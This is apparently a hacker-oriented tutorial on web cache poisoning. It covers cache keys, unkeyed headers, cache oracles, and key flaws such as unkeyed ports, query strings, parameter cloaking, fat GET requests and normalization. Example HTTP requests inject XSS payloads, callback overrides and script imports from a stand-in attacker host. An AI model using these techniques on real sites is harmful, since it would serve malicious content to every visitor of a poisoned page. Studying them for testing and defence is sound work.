Cache Corruption: Unveiling the Web Cache Poisoning Exploit

A Hacker's Insight into Manipulating Caches for Exploits and Attacks


Web Caches 101

A web cache is a system that temporarily stores web documents such as HTML pages, images, and media files to reduce bandwidth usage, server load, and latency. It serves copies of requested content directly to users, avoiding the need to fetch it from the original server. Web caches are implemented at various levels, including browser caches, proxy caches, and content delivery networks (CDNs), and they play a crucial role in improving the efficiency and speed of web browsing.

How Web Caches Work

The cache sits between the server and the user. It saves (caches) the responses to particular requests for a fixed amount of time. If another user then sends an equivalent request, the cache simply serves a copy of the cached response directly to that user, without any interaction with the back-end.

What is a cache key

When a web cache receives an HTTP request, it assesses whether there is a cached response it can directly serve or if it needs to forward the request to the back-end server. The cache identifies equivalent requests by comparing a predefined subset of components, collectively known as the "cache key," typically including the request line and Host header. Components not included in the cache key are deemed "unkeyed."

If the cache key of an incoming request matches that of a previous request, the cache treats them as equivalent. Consequently, it serves a copy of the cached response generated for the original request. This behavior persists for all subsequent requests with the matching cache key until the cached response expires.

This means that caches think the following two requests are equivalent, and will happily respond to the second request with a response cached from the first:

GET /blog/post.php?mobile=1 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 … Firefox/57.0
Cookie: language=pl;
Connection: close

GET /blog/post.php?mobile=1 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 … Firefox/57.0
Cookie: language=en;
Connection: close

As a result, the page will be served in the wrong language to the second visitor.
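
To make the idea of a cache key concrete, here is a minimal Python sketch. It assumes a hypothetical cache that keys only on the request line and the Host header; the Request class and cache_key function are illustrative names, not part of any real caching product.

```python
from dataclasses import dataclass, field


@dataclass
class Request:
    method: str
    target: str  # path plus query string
    headers: dict = field(default_factory=dict)


def cache_key(req: Request) -> tuple:
    """Hypothetical key: request line plus Host header, nothing else."""
    return (req.method, req.target, req.headers.get("Host", "").lower())


polish = Request("GET", "/blog/post.php?mobile=1",
                 {"Host": "example.com", "Cookie": "language=pl;"})
english = Request("GET", "/blog/post.php?mobile=1",
                  {"Host": "example.com", "Cookie": "language=en;"})

# The Cookie header is unkeyed, so both requests map to the same cache entry.
same_key = cache_key(polish) == cache_key(english)
print(same_key)  # True
```

Since the Cookie header never reaches the key, the cache has no way to tell the two visitors apart.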

Web Cache Poisoning In Steps

Web cache poisoning is an attack in which an attacker manipulates the contents of a web cache so that it serves malicious content to other users. Web caches are commonly deployed in proxy servers, Content Delivery Networks (CDNs), and web application accelerators, so a single poisoned entry can reach many users.

Here's a simplified explanation of how it works:

  1. Caching Mechanism: When a user requests a web page, the cache may store a copy of the response so that it can be served faster in the future. The cached copy is associated with a specific cache key, typically derived from the URL and Host header.

  2. Attack Vector: An attacker manipulates the input parameters, headers, or other aspects of the requested URL in a way that causes the cache to store a malicious version of the page. This can be achieved through various techniques such as injecting malicious parameters, manipulating headers, or exploiting vulnerabilities in the web application.

  3. Serving Poisoned Content: When subsequent users request the same URL, the cache retrieves the poisoned version of the page and serves it to unsuspecting users. This could lead to a range of malicious activities, including spreading malware, stealing sensitive information, or performing other attacks.

Constructing a web cache poisoning attack

Constructing a basic web cache poisoning attack involves the following steps:

  1. Identify and evaluate unkeyed inputs

  2. Elicit a harmful response from the back-end server

  3. Get the response cached

Identify and evaluate unkeyed inputs

Web cache poisoning attacks rely on manipulating unkeyed inputs, such as headers.

  • Using Param Miner

    Run "Guess headers" from Param Miner.

    If a request containing one of its injected inputs has an effect on the response, Param Miner logs this in Burp, either in the "Issues" pane or in the "Output" tab of the extension.

    For example, Param Miner might report an unkeyed X-Forwarded-Host header on the home page of the website.

Elicit a harmful response from the back-end server

After identifying an unkeyed input, the subsequent step involves assessing how the website processes this input. Gaining a comprehensive understanding of this processing is crucial for triggering a harmful response successfully. If the input is reflected in the server's response without adequate sanitization or is utilized to dynamically generate additional data, it becomes a potential vulnerability for web cache poisoning.

Get the response cached

Various factors, including file extension, content type, route, status code, and response headers, influence whether a response is cached. Experimentation with different requests on various pages is often necessary to understand the cache behavior.

Once the method to cache a response containing the malicious input is determined, you are prepared to deploy the exploit to potential victims in a web cache poisoning attack.

Exploiting cache design flaws

Websites are vulnerable to web cache poisoning if they handle unkeyed input in an unsafe way and allow the subsequent HTTP responses to be cached. This vulnerability can be used as a delivery method for a variety of different attacks.

XSS Via Web Cache Poisoning

If unkeyed input is reflected in a cacheable response without sanitization, it can be easy to exploit.

For example, consider the following request and response:

GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: innocent-website.co.uk

HTTP/1.1 200 OK
Cache-Control: public
<meta property="og:image" content="https://innocent-website.co.uk/cms/social.png" />

We can see that the value of the X-Forwarded-Host header is used to generate an Open Graph image URL, which is then reflected in the response.

XSS exploitation:

X-Forwarded-Host: a."><script>alert(1)</script>"

HTTP/1.1 200 OK
Cache-Control: public
<meta property="og:image" content="https://a."><script>alert(1)</script>"/cms/social.png" />

Once this response is cached, all users who access /en?region=uk are served the XSS payload until the cache entry expires.
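
The whole flow can be simulated offline. The following Python sketch is a toy model under stated assumptions: backend is a hypothetical origin that reflects X-Forwarded-Host without escaping, and ToyCache is a hypothetical cache keyed only on the Host header and the request target. Neither reflects how any specific product is implemented.

```python
def backend(path: str, headers: dict) -> str:
    """Hypothetical vulnerable origin: reflects X-Forwarded-Host unescaped."""
    host = headers.get("X-Forwarded-Host", headers["Host"])
    return f'<meta property="og:image" content="https://{host}/cms/social.png" />'


class ToyCache:
    """Keys responses on (Host, path) only; every other header is unkeyed."""

    def __init__(self, origin):
        self.origin = origin
        self.store = {}

    def fetch(self, path: str, headers: dict) -> str:
        key = (headers["Host"], path)
        if key not in self.store:      # miss: ask the origin and remember it
            self.store[key] = self.origin(path, headers)
        return self.store[key]         # hit: the origin is not consulted


cache = ToyCache(backend)
payload = 'a."><script>alert(1)</script>"'

# The attacker's request populates the cache entry for /en?region=uk.
cache.fetch("/en?region=uk", {"Host": "innocent-website.com",
                              "X-Forwarded-Host": payload})

# A victim sends an ordinary request and still receives the poisoned page.
victim_page = cache.fetch("/en?region=uk", {"Host": "innocent-website.com"})
print("<script>alert(1)</script>" in victim_page)  # True
```

In this model, either escaping the reflected value or adding X-Forwarded-Host to the key would stop the victim from receiving the payload.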

Exploiting unsafe handling of resource imports

Certain websites utilize unkeyed headers to dynamically create URLs for importing external resources, such as JavaScript files hosted externally.

If the response, which includes this manipulated URL, is cached, the attacker's JavaScript file has the potential to be imported and executed in the browser session of any user whose request aligns with the matching cache key.

GET / HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: evil-user.net
User-Agent: Mozilla/5.0 Firefox/57.0

HTTP/1.1 200 OK
<script src="https://evil-user.net/static/analytics.js"></script>

Exploit Web Cache Poisoning using multiple headers

Some websites demand more sophisticated attacks and only become vulnerable when an attacker can craft a request that manipulates multiple unkeyed inputs.

For instance, consider a website that mandates secure communication via HTTPS. To enforce this, if a request employing a different protocol is received, the website dynamically generates a redirect to itself using HTTPS:

Original Request:

GET /random HTTP/1.1
Host: evil-site.com
X-Forwarded-Proto: http

Server Response:

HTTP/1.1 301 Moved Permanently
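Location: https://evil-site.com/random

On its own, this redirect is harmless. However, if another unkeyed header, such as X-Forwarded-Host, also influences the generated URL, an attacker can combine the two headers to produce a cacheable response that redirects users to a malicious URL.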

Information exposure in the responses

Sometimes websites make themselves more vulnerable to web cache poisoning by giving away too much information about themselves and their behavior.

Cache-control directives

Sometimes, responses explicitly disclose information essential for a successful cache poisoning attack.

For instance, certain responses reveal details such as the frequency of cache purges or the age of the currently cached response:

HTTP/1.1 200 OK
Via: 1.1 varnish-v4
Age: 174
Cache-Control: public, max-age=1800

Understanding such information can aid attackers in refining their approach, potentially leading to more effective cache poisoning.
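
As a small worked example, the remaining lifetime of the cached entry above can be estimated from the two headers. This Python sketch assumes the cache honours max-age and reports an accurate Age; the function name seconds_until_expiry is illustrative, and real caches may apply other rules (for example s-maxage or custom TTLs).

```python
import re


def seconds_until_expiry(headers: dict):
    """Return max-age minus Age, or None when no max-age directive is present."""
    match = re.search(r"max-age=(\d+)", headers.get("Cache-Control", ""))
    if match is None:
        return None
    age = int(headers.get("Age", "0"))
    return max(int(match.group(1)) - age, 0)


observed = {
    "Via": "1.1 varnish-v4",
    "Age": "174",
    "Cache-Control": "public, max-age=1800",
}

remaining = seconds_until_expiry(observed)
print(remaining)  # 1626
```

Under these assumptions the entry expires in roughly 27 minutes, which tells an attacker when a poisoning request is likely to reach the back-end instead of being answered from the cache.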

Vary Header

When a cache receives a request that can be satisfied by a cached response that has a Vary header field, it must not use that cached response unless all header fields as nominated by the Vary header match in both the original (cached) request and the new request.

GET /random HTTP/1.1
Host: evil-site.com
User-Agent: fakebrowser

HTTP/1.1 200 OK
vary: User-Agent
X-Cache: hit
<script src="https://evil-user.net/static/analytics.js"></script>

Because the Vary header of this cached response lists User-Agent, the User-Agent value effectively becomes part of the cache key. Only users whose User-Agent is fakebrowser receive this cached response when they request the same endpoint, which lets an attacker target a specific group of users.
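
The effect of Vary on the key can be sketched in a few lines of Python. This is a simplified model, assuming a hypothetical cache that appends the request's value for each header named in Vary to a base key of host and path; real caches implement this as a secondary lookup and may normalize header values.

```python
def cache_key(host: str, path: str, request_headers: dict, vary=()) -> tuple:
    """Base key plus the request's value for every header listed in Vary."""
    varied = tuple((name.lower(), request_headers.get(name, "")) for name in vary)
    return (host, path) + varied


vary = ["User-Agent"]
poisoned = cache_key("evil-site.com", "/random",
                     {"User-Agent": "fakebrowser"}, vary)
same_browser = cache_key("evil-site.com", "/random",
                         {"User-Agent": "fakebrowser"}, vary)
other_browser = cache_key("evil-site.com", "/random",
                          {"User-Agent": "Mozilla/5.0"}, vary)

print(poisoned == same_browser)   # True: this visitor gets the cached response
print(poisoned == other_browser)  # False: this visitor triggers a fresh lookup
```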

Exploiting cache implementation flaws

You can access a much greater attack surface for web cache poisoning by exploiting quirks in specific implementations of caching systems.

Cache Key Flaws

Websites take most of their input from the URL path and the query string. As a result, this is a well-trodden attack surface for various hacking techniques.

In practice, many websites and CDNs perform various transformations on keyed components when they are saved in the cache key. This can include:

  • Excluding the query string

  • Filtering out specific query parameters

  • Normalizing input in keyed components

These transformations might lead to some unexpected quirks, mainly due to differences between the data written to the cache key and the data passed into the application code, despite originating from the same input. These flaws in cache key generation could be exploited to poison the cache via inputs that may initially appear unusable.

Cache probing methodology

Probing for cache implementation flaws requires a different approach than traditional web cache poisoning. These modern techniques focus on pinpointing weaknesses in the cache's unique implementation and setup, which can differ greatly between websites. Therefore, a thorough understanding of the target cache and its operations is crucial.

The methodology consists of the following steps:

  1. Locate a suitable cache oracle

  2. Investigate key handling

  3. Identify a vulnerable gadget

Identify a suitable cache oracle

A cache oracle is simply a page or endpoint that provides feedback about the cache's behavior.

It should be cacheable and clearly indicate whether you received a cached response or a direct one from the server. This indication can be communicated through:

  • An HTTP header explicitly indicating a cache hit.

  • Observable alterations in dynamic content.

  • Noticeable differences in response times.

If a specific third-party cache is detected, consulting its documentation can yield valuable insights. Documentation might outline default cache key construction details. Some caches even provide features for directly viewing the cache key.

For instance, Akamai-based websites might support the header "Pragma: akamai-x-get-cache-key," allowing users to display the cache key in the response headers.

GET /?param=1 HTTP/1.1
Host: innocent-website.com
Pragma: akamai-x-get-cache-key

HTTP/1.1 200 OK
X-Cache-Key: innocent-website.com/?param=1
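
When probing an oracle by hand gets tedious, the header-based signals can be checked programmatically. The Python sketch below is a rough heuristic, assuming the cache exposes an X-Cache or Cache-Status header containing the word "hit" or "miss", or a non-zero Age; the classify function is a hypothetical helper, and header names and values differ between cache vendors.

```python
def classify(headers: dict) -> str:
    """Guess 'hit', 'miss', or 'unknown' from common cache-related headers."""
    lowered = {name.lower(): value.lower() for name, value in headers.items()}
    for name in ("x-cache", "cache-status"):
        value = lowered.get(name, "")
        if "hit" in value:
            return "hit"
        if "miss" in value:
            return "miss"
    # A positive Age suggests the response spent time in a cache.
    age = lowered.get("age", "")
    if age.isdigit() and int(age) > 0:
        return "hit"
    return "unknown"


print(classify({"X-Cache": "hit"}))
print(classify({"Cache-Status": "miss"}))
print(classify({"Age": "174", "Via": "1.1 varnish-v4"}))
print(classify({"Content-Type": "text/html"}))
```

If none of these headers is present, the oracle has to rely on the other signals listed above, such as changes in dynamic content or response timing.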

Probe key handling

The next step is to check whether the cache performs any processing of the input when generating the cache key.

Focus on examining any transformations occurring during the cache key generation. Identify if there are exclusions from keyed components, such as specific query parameters or the entire query string. Additionally, observe whether the cache removes the port from the Host header as part of the transformation.

Identify an exploitable gadget

These gadgets often relate to common client-side vulnerabilities such as reflected XSS and open redirects. When combined with web cache poisoning, the severity of these attacks increases significantly, turning a reflected vulnerability into a stored one. This removes the necessity to convince a victim to access a specifically crafted URL, as the payload is automatically delivered to anyone visiting the regular, legitimate URL.

Exploiting cache key flaws

Let's take a look at some typical cache key flaws and how you might exploit them.

  • Unkeyed port

  • Unkeyed query string

  • Unkeyed query parameters

  • Cache parameter cloaking

  • Normalized cache keys

  • Cache key injection

  • Internal cache poisoning

Unkeyed Port

The Host header, usually included in the cache key, might not seem like an obvious target for payload injection at first. However, some caching systems parse this header and exclude the port from the cache key. Exploiting this behavior can result in web cache poisoning.

For example, if a redirect URL is generated dynamically based on the Host header, adding an arbitrary port could trigger a denial-of-service attack. This action would redirect all users visiting the home page to a nonfunctional port, leading to downtime until the cache expires.

Let's say that our hypothetical cache oracle is the target website's home page. This automatically redirects users to a region-specific page. It uses the Host header to dynamically generate the Location header in the response:

GET / HTTP/1.1
Host: vulnerable-website.com

HTTP/1.1 302 Found
Location: https://vulnerable-website.com/en
Cache-Status: miss

To test whether the port is excluded from the cache key, we first need to request an arbitrary port and make sure that we receive a fresh response from the server that reflects this input:

GET / HTTP/1.1
Host: vulnerable-website.com:1337

HTTP/1.1 302 Found
Location: https://vulnerable-website.com:1337/en
Cache-Status: miss

Next, we'll send another request, but this time we won't specify a port:

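GET / HTTP/1.1
Host: vulnerable-website.com

HTTP/1.1 302 Found
Location: https://vulnerable-website.com:1337/en
Cache-Status: hit

The request without a port received the cached redirect that contains port 1337, which shows that the port is excluded from the cache key.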
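
The flaw probed in this sequence can be modelled with a short Python sketch. It assumes a hypothetical cache that strips everything after the first colon in the Host header before building the key; the cache_key function is illustrative and deliberately ignores IPv6 literals.

```python
def cache_key(method: str, path: str, host_header: str) -> tuple:
    """Hypothetical flawed key: the port is dropped from the Host header."""
    hostname = host_header.split(":", 1)[0].lower()  # ignores IPv6 literals
    return (method, path, hostname)


poisoning_request = cache_key("GET", "/", "vulnerable-website.com:1337")
victim_request = cache_key("GET", "/", "vulnerable-website.com")

# Both requests share one cache entry even though the back-end saw different
# Host headers and generated different Location values.
print(poisoning_request == victim_request)  # True
```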

Unkeyed query string

Like the Host header, the request line is typically keyed. However, one of the most common cache-key transformations is to exclude the entire query string.

Detecting an unkeyed query string

To identify a dynamic page, you would normally observe how changing a parameter value has an effect on the response. But if the query string is unkeyed, most of the time you would still get a cache hit, and therefore an unchanged response, regardless of any parameters you add. Consequently, traditional cache-buster query parameters become ineffective.

Fortunately, there are alternative ways of adding a cache buster, such as adding it to a keyed header that doesn't interfere with the application's behavior. Some typical examples include:

Accept-Encoding: gzip, deflate, cachebuster
Accept: */*, text/cachebuster
Cookie: cachebuster=1
Origin: https://cachebuster.vulnerable-website.com

  • Param Miner

    If you use Param Miner, you can also select the options "Add static/dynamic cache buster" and "Include cache busters in headers". It will then automatically add a cache buster to commonly keyed headers in any requests that you send using Burp's manual testing tools.
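
If you are scripting your own tests instead, a fresh cache buster can be generated per request. The following Python sketch builds the same four headers with a random token; cache_buster_headers is a hypothetical helper, and whether any of these headers is actually keyed depends on the target cache.

```python
import secrets


def cache_buster_headers(site: str) -> dict:
    """Build header variants that each carry a random cache-buster token."""
    token = secrets.token_hex(4)  # 8 hexadecimal characters
    return {
        "Accept-Encoding": f"gzip, deflate, {token}",
        "Accept": f"*/*, text/{token}",
        "Cookie": f"{token}=1",
        "Origin": f"https://{token}.{site}",
    }


headers = cache_buster_headers("vulnerable-website.com")
for name, value in headers.items():
    print(f"{name}: {value}")
```

In practice you would send only one of these headers at a time, so that you can tell which one the cache includes in its key.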

Exploiting an unkeyed query string

Let's assume that the caching system only considers the path and host when generating the cache key and excludes the query string. Once the response to the following request has been cached, subsequent requests with different values for param1 and param2 still receive the same cached response:

GET /example/page?param1=value1&param2=value2 HTTP/1.1
Host: example.com

Suppose the parameter param1 in the query string is vulnerable to XSS:

Request:

GET /example/page?param1=<script>alert("XSS");</script>&param2=value2 HTTP/1.1
Host: example.com

If the caching system doesn't consider the query string parameters when generating the cache key, it might cache the response containing the injected script:

HTTP/1.1 200 OK
Content-Type: text/html
Cache-Control: max-age=3600
...
<body>
  <!-- Cached response with XSS payload -->
  <script>alert("XSS");</script>
</body>

Subsequent visitors accessing the same page with the cached response would unknowingly execute the injected script, leading to a successful XSS attack.
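
A minimal Python sketch of this key derivation, assuming a hypothetical cache that keeps the host and path but discards the query string entirely (cache_key is an illustrative name):

```python
from urllib.parse import urlsplit


def cache_key(host: str, target: str) -> tuple:
    """Hypothetical key that keeps the path but drops the query string."""
    return (host, urlsplit(target).path)


clean = "/example/page?param1=value1&param2=value2"
poisoned = '/example/page?param1=<script>alert("XSS");</script>&param2=value2'

# The payload lives entirely in the unkeyed query string.
print(cache_key("example.com", clean) == cache_key("example.com", poisoned))  # True
```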

Unkeyed query parameters

Websites often exclude from the cache key specific query parameters that aren't relevant to the back-end application, such as those used for analytics or targeted advertising. UTM parameters such as utm_content are good candidates to check during testing.

Parameters excluded from the cache key usually have little impact on the response, so it's unlikely that there will be useful gadgets that accept input from them. However, in some cases, pages handle the entire URL in a vulnerable way, allowing arbitrary parameters to be exploited.

Cache parameter cloaking

Excluding a harmless parameter from the cache key and finding no exploitable gadgets based on the full URL may seem like a dead end, but it's where the situation can become interesting.

Understanding how the cache parses URLs to identify and remove unwanted parameters can reveal interesting quirks, especially discrepancies between cache and application parsing. Exploiting these differences can potentially allow arbitrary parameters to bypass cache exclusion by "cloaking" them within excluded parameters.

For instance, according to the de facto standard, a parameter in a URL is typically preceded by a question mark (?) if it's the first one in the query string, or by an ampersand (&) otherwise. However, poorly written parsing algorithms may incorrectly treat any occurrence of ? as the start of a new parameter, irrespective of its position in the query string.

Assuming the cache's exclusion algorithm incorrectly treats any occurrence of ? as a parameter delimiter, while the server's algorithm only recognizes the first ?, consider the following request:

GET /?example=123?excluded_param=bad-stuff-here

In this scenario, the cache would identify two parameters and exclude the second one from the cache key. However, the server only interprets one parameter, example, whose value encompasses the entire rest of the query string, including our payload. If the value of example is passed into a useful gadget, our payload is successfully injected without impacting the cache key.
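
The parsing discrepancy can be reproduced with two tiny parsers. In this Python sketch, cache_view models the hypothetical buggy cache that splits on every ? and &, while server_view models an origin that splits on & only; both functions are illustrative and operate on the query string after the first ?.

```python
import re


def cache_view(query: str, excluded=("excluded_param",)) -> str:
    """Hypothetical buggy cache: every '?' or '&' starts a new parameter."""
    parts = re.split(r"[?&]", query)
    kept = [p for p in parts if p.partition("=")[0] not in excluded]
    return "&".join(kept)


def server_view(query: str) -> dict:
    """Hypothetical origin: only '&' separates parameters."""
    params = {}
    for part in query.split("&"):
        name, _, value = part.partition("=")
        params[name] = value
    return params


query = "example=123?excluded_param=bad-stuff-here"
print(cache_view(query))   # example=123
print(server_view(query))  # {'example': '123?excluded_param=bad-stuff-here'}
```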

Exploiting parameter parsing quirks

Let’s say that when we access the home page of an application, it makes this request:

GET /js/geolocate.js?callback=setCountryCookie

and this is the response:

HTTP/2 200 OK
Cache-Control: max-age=35
Age: 0
X-Cache: miss
...
setCountryCookie({"country":"United Kingdom"});

If we change the value of the callback parameter, the name of the function in the response changes accordingly:

GET /js/geolocate.js?callback=hacker
----------
HTTP/2 200 OK
...
hacker({"country":"United Kingdom"});

We can use the parameter to execute JavaScript code, but we can’t poison the cache for other users because the parameter is keyed.

If we duplicate the callback parameter, only the final one is reflected in the response:

GET /js/geolocate.js?callback=setCountryCookie&callback=hacker
----------
HTTP/2 200 OK
...
hacker({"country":"United Kingdom"});

Both parameters are still keyed, so we still can’t poison the cache for other users. We need a way to pass two callback parameters while only the first one is keyed.

Let’s say that we find that the utm_content parameter is supported but excluded from the cache key.

If we append the second callback parameter to the utm_content parameter using a semicolon, it is excluded from the cache key but still overwrites the callback function in the response:

GET /js/geolocate.js?callback=setCountryCookie&utm_content=anything;callback=alert(1)

HTTP/1.1 200 OK
X-Cache-Key: /js/geolocate.js?callback=setCountryCookie
…
alert(1)({"country" : "United Kingdom"})

Because only the first callback parameter is keyed and the second one is not, anyone who requests GET /js/geolocate.js?callback=setCountryCookie receives our poisoned cached response.

This works because some frameworks, such as Ruby on Rails, see the semicolon as a delimiter and split the query string into three separate parameters:

  1. callback=setCountryCookie

  2. utm_content=anything

  3. callback=alert(1)

In this scenario, the presence of a duplicate callback parameter is significant. Ruby on Rails prioritizes the final occurrence when there are duplicate parameters with different values. Consequently, the cache key retains the innocent, expected parameter value, ensuring normal cached responses for other users. However, on the backend, the same parameter holds a distinct value, which is our injected payload. This secondary value gets passed into the gadget and is reflected in the poisoned response.
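
The mismatch can be illustrated with two simplified parsers in Python. This is only a model of the behavior described above: cache_key_query stands in for a hypothetical cache that splits on & and drops utm_content, and backend_params stands in for a framework that also splits on ; and lets the last duplicate win. It does not reproduce the actual parsing code of Ruby on Rails or of any cache.

```python
import re


def cache_key_query(query: str, excluded=("utm_content",)) -> str:
    """Hypothetical cache: splits on '&' only, then drops excluded parameters."""
    kept = [p for p in query.split("&") if p.partition("=")[0] not in excluded]
    return "&".join(kept)


def backend_params(query: str) -> dict:
    """Hypothetical framework: splits on '&' and ';', last duplicate wins."""
    params = {}
    for part in re.split(r"[&;]", query):
        name, _, value = part.partition("=")
        params[name] = value  # later duplicates overwrite earlier ones
    return params


query = "callback=setCountryCookie&utm_content=anything;callback=alert(1)"
print(cache_key_query(query))             # callback=setCountryCookie
print(backend_params(query)["callback"])  # alert(1)
```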

Exploiting fat GET support

In certain instances, the HTTP method may not be factored into the cache key. This could enable cache poisoning via a POST request containing a malicious payload in the body, which would then be served in response to users' GET requests. Although rare, a similar effect can sometimes be achieved by augmenting a GET request with a body to create a "fat" GET request:

GET /?param=innocent HTTP/1.1
…
param=bad-stuff-here

Here, the cache key would be derived from the request line, while the server-side value of the parameter would be extracted from the body.

This scenario is feasible only if a website accepts GET requests with a body, although there are potential workarounds. Encouraging "fat GET" handling can sometimes be achieved by overriding the HTTP method. For instance:

GET /?param=innocent HTTP/1.1
Host: innocent-website.com
X-HTTP-Method-Override: POST
…
param=bad-stuff-here

If the X-HTTP-Method-Override header is unkeyed, you could submit a pseudo-POST request while maintaining a GET cache key derived from the request line.
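
A short Python sketch shows why a fat GET is dangerous. It assumes a hypothetical cache that keys on the method, request target, and host, and a hypothetical origin that lets body parameters override query-string parameters; both keyed_part and backend_value are illustrative names.

```python
from urllib.parse import parse_qs, urlsplit


def keyed_part(method: str, target: str, host: str) -> tuple:
    """Hypothetical cache key: the request body is not part of it."""
    return (method, target, host)


def backend_value(target: str, body: str, name: str) -> str:
    """Hypothetical origin: body parameters override the query string."""
    params = parse_qs(urlsplit(target).query)
    params.update(parse_qs(body))
    return params[name][-1]


attacker = keyed_part("GET", "/?param=innocent", "innocent-website.com")
victim = keyed_part("GET", "/?param=innocent", "innocent-website.com")

print(attacker == victim)  # True: same cache entry
print(backend_value("/?param=innocent", "param=bad-stuff-here", "param"))
```

The second line printed is bad-stuff-here, the value the origin would use to build the response that ends up cached under the innocent-looking key.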

Normalized cache keys

Cache key normalization can introduce exploitable behavior, enabling exploits that would otherwise be difficult to achieve.

For instance, when finding reflected XSS in a parameter, it's often impractical to exploit because modern browsers URL-encode necessary characters, and the server doesn't decode them. However, some caching implementations normalize keyed input when adding it to the cache key. This means that both of the following requests would have the same cache key:

GET /example?param="><test>
GET /example?param=%22%3e%3ctest%3e

Exploiting this behavior allows you to poison the cache with an unencoded XSS payload using tools like Burp Repeater. When the victim visits the malicious URL, the payload remains URL-encoded by their browser. However, once normalized by the cache, it shares the same cache key as the response containing the unencoded payload. Consequently, the cache serves the poisoned response, executing the payload client-side.
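
The collision between the two requests can be checked with a few lines of Python. This sketch assumes a hypothetical cache that percent-decodes the request target before using it as the key; normalized_key is an illustrative name, and real caches may normalize only some characters.

```python
from urllib.parse import unquote


def normalized_key(host: str, target: str) -> tuple:
    """Hypothetical cache key that percent-decodes the request target."""
    return (host, unquote(target))


raw = '/example?param="><test>'              # sent with Burp Repeater
encoded = "/example?param=%22%3e%3ctest%3e"  # what a victim's browser sends

print(normalized_key("example.com", raw) == normalized_key("example.com", encoded))  # True
```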